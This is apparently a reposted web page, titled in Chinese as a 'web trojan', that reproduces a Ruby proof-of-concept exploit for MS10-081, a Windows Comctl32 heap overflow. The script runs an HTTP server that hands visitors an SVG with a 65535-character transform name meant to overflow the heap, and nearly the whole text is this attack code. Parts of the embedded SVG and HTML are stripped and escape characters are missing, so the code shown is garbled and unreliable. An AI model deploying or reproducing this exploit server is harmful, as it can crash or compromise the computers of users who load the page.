|
MS10-081: Windows Common Control Library (Comctl32) Heap Overflow,MS10-081 网马:
#!/usr/bin/env ruby
# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
headers = "HTTP/1.1 #{code} #{message}rn" +
"Date: #{date_str}rn" +
"Content-Length: #{data.length}rn" +
"Content-Type: #{type}rnrn"
puts "[+] Sending #{opts[:desc]}"
sock.write(headers + data) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
puts " " + out_str.split("n")[0]
return true
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
port = ARGV[0] || 55555
transform_name = "x21" * 65535
svg =
br>
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
style="fill: #ffffff"
transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
>
CLICK ME
SVG
html =
HTML
puts "[+] Listening on port #{port}"
puts
TCPServer.open(port) do |srv|
while true
cli = srv.accept
req = ""
next unless sock_read(cli, req, 5)
while req.length > 0
if req =~ /GET.*svg/i
break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
elsif req =~ /QUIT/
exit()
else
break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
end
req = ""
next unless sock_read(cli, req, 5)
end
cli.close rescue next
end
end
|
评论